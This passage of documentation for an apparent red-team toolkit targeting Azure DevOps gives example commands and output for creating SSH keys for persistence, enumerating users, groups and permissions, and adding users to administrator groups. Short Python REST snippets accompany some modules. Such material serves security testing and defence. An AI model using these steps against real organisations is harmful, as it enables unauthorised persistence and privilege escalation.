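    f"https://vssps.dev.azure.com/{org}/_apis/tokens/pats?api-version=7.1-preview.1",
    headers={"Authorization": f"Bearer {aad_token}"},
)
for p in r.json().get("patTokens", []):
    print(p["authorizationId"], p["displayName"], p["scope"], p["validTo"])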

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.

Syntax

Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed, and then list the currently active PATs for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:04:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, valid-until date, and last 20 characters of the public SSH key for the key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 2:51:22 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.

Syntax

Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and valid-until date for all active SSH keys for the user. Additionally, it will print the last 20 characters of each public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:37:10 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.

Syntax

Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether the SSH key was removed, and then list the currently active SSH keys for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 1:50:08 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance

Syntax

Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:07 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | [email protected]
jsmith | John Smith | [email protected]
rsmith | Ron Smith | [email protected]
user2 | User 2 | [email protected]

4/3/23 20:12:08 Finished execution of listuser
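
User enumeration corresponds to the Graph REST API (preview) on the vssps host; a minimal sketch with placeholder values:

import requests

org, pat = "YourOrganization", "apiToken"  # placeholders

r = requests.get(
    f"https://vssps.dev.azure.com/{org}/_apis/graph/users?api-version=7.1-preview.1",
    auth=("", pat),
)
for user in r.json().get("value", []):
    print(f"{user.get('displayName')} | {user.get('principalName')}")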

Search User

Use Case

Search for given user(s) in an Azure DevOps instance

Syntax

Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:23 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | [email protected]
user2 | User 2 | [email protected]

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance

Syntax

Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of each group.

ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


---SNIP---

4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in an Azure DevOps instance

Syntax

Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for each matching group.

ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:41 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group

Syntax

Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with each member of that group, including the member's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:03 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | [email protected] | User 1
[TestProject2]\Build Administrators | [email protected] | User 2
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | Ron Smith
[TestProject2]\Project Administrators | [email protected] | User 1
[TestProject2]\Project Administrators | [email protected] | User 2
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[ProjectWithMultipleRepos]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Build Administrators | [email protected] | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.

Syntax

Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description of each group that has permissions to the matching project. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


[*] INFO: Listing group members for each group that has permissions to this project



GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | [email protected] | User 1
[MaraudersMap]\Contributors | [email protected] | User 2


GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | [email protected] | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins


GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | [email protected] | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.

Syntax

Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 2:52:45 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin
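
Group membership changes like this correspond to the Graph Memberships API: resolve the user's and group's subject descriptors (from the graph/users and graph/groups endpoints), then PUT a membership between them. A hedged sketch with placeholder descriptors; ADOKit's internal implementation may differ:

import requests

org, pat = "YourOrganization", "apiToken"  # placeholders
user_descriptor = "aad.EXAMPLE_USER_DESCRIPTOR"      # placeholder, from /_apis/graph/users
group_descriptor = "vssgp.EXAMPLE_GROUP_DESCRIPTOR"  # placeholder, from /_apis/graph/groups

r = requests.put(
    f"https://vssps.dev.azure.com/{org}/_apis/graph/memberships/"
    f"{user_descriptor}/{group_descriptor}?api-version=7.1-preview.1",
    auth=("", pat),
)
print("[+] User successfully added" if r.ok else f"[-] Failed: {r.status_code}")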

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.

Syntax

Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:19:43 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.

Syntax

Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:41:51 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | [email protected] | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.

Syntax

Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:42:10 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.

Syntax

Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:04:40 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[YourOrganization]\Project Collection Administrators | [email protected] | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.

Syntax

Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:10:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.

Syntax

Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:39 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | [email protected] | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.

Syntax

Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.

Syntax

Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:13 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | [email protected] | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.

Syntax

Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:27 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.

Syntax

Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:01 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith
[YourOrganization]\Project Collection Service Accounts | [email protected] | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.

Syntax

Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:43 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith

